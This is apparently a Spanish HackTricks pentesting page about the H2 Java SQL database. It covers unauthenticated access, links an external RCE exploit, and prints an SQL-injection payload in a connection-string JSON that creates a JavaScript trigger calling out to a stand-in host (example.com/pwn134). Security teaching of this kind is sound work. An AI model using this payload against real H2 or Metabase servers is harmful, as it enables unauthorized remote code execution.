H2 - Java SQL database

Aprende hacking en AWS de cero a héroe con htARTE (Experto en Equipos Rojos AWS de HackTricks)!

Otras formas de apoyar a HackTricks:

Página oficial: https://www.h2database.com/html/main.html

Acceso

Puedes indicar un nombre de base de datos inexistente para crear una nueva base de datos sin credenciales válidas (sin autenticación):

O si sabes que por ejemplo se está ejecutando un mysql y conoces el nombre de la base de datos y las credenciales para esa base de datos, simplemente puedes acceder:

Truco del box Hawk de HTB.

RCE

Teniendo acceso para comunicarte con la base de datos H2, verifica este exploit para obtener RCE en ella: https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed

Inyección SQL de H2 a RCE

En esta publicación se explica un payload para obtener RCE a través de una base de datos H2 abusando de una Inyección SQL.

[...]
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
[...]
Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Última actualización